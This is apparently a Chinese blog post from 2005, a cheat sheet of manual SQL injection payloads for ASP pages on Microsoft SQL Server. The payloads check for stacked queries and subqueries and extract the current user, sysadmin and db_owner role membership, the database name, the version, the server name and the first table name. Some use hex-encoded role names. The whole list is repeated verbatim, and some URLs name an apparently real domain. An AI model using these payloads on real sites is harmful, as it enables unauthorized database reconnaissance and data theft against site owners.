SQL 注入有常用语句
2005-10-14 19:19
573 查看
是否支持多句查询
http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int--
是否支持子查询
http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0
返回用户名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And user%2Bchar(124)=0
当前用户是否为 sysadmin 固定服务器角色的成员。
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1
PS:0x730079007300610064006D0069006E00 = sysadmin
当前用户是否为 db_owner 固定数据库角色的成员
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1
0x640062005F006F0077006E0065007200 = db_owner
返回数据库名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And db_name()%2Bchar(124)=0
操作系统和SQLserver版本
http://www.99568.com/99568news/shownews.asp?id=51 And @@version = 1
本地服务器名称
http://www.99568.com/99568news/shownews.asp?id=51 And @@SERVERNAME = 1
http://www.xxx.com.cn/newhomelink/site/News/Content.asp?NewsID=1077 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一个表名
http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int--
是否支持子查询
http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0
返回用户名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And user%2Bchar(124)=0
当前用户是否为 sysadmin 固定服务器角色的成员。
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1
PS:0x730079007300610064006D0069006E00 = sysadmin
当前用户是否为 db_owner 固定数据库角色的成员
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1
0x640062005F006F0077006E0065007200 = db_owner
返回数据库名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And db_name()%2Bchar(124)=0
操作系统和SQLserver版本
http://www.99568.com/99568news/shownews.asp?id=51 And @@version = 1
本地服务器名称
http://www.99568.com/99568news/shownews.asp?id=51 And @@SERVERNAME = 1
http://www.xxx.com.cn/newhomelink/site/News/Content.asp?NewsID=1077 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一个表名
相关文章推荐
- MSSQL注入常用SQL语句整理
- 我的学习笔记(SQL简单的注入)(1) 手工注入以及注入一些常用语句
- 手工MSSQL注入常用SQL语句
- 手工MSSQL注入常用SQL语句
- 手工注入常用SQL语句
- SQL 注入有常用语句
- 手工MSSQL注入常用SQL语句
- SQL 注入有常用语句
- SQL 注入有常用语句
- 手工MSSQL注入常用SQL语句
- MSSQL注入常用SQL语句整理
- 手工MSSQL注入常用SQL语句
- 站长注意SQL 注入一些常用语句
- MySQL5.5 Command Line Client SQL常用基本语句
- sql常用语句
- SQL Server 数据库管理常用的SQL和T-SQL语句
- SQL常用语句汇总
- 浅谈MySQL中优化sql语句查询常用的30种方法
- 常用的sql语句
- SqlServer和Oracle中一些常用的sql语句10 特殊应用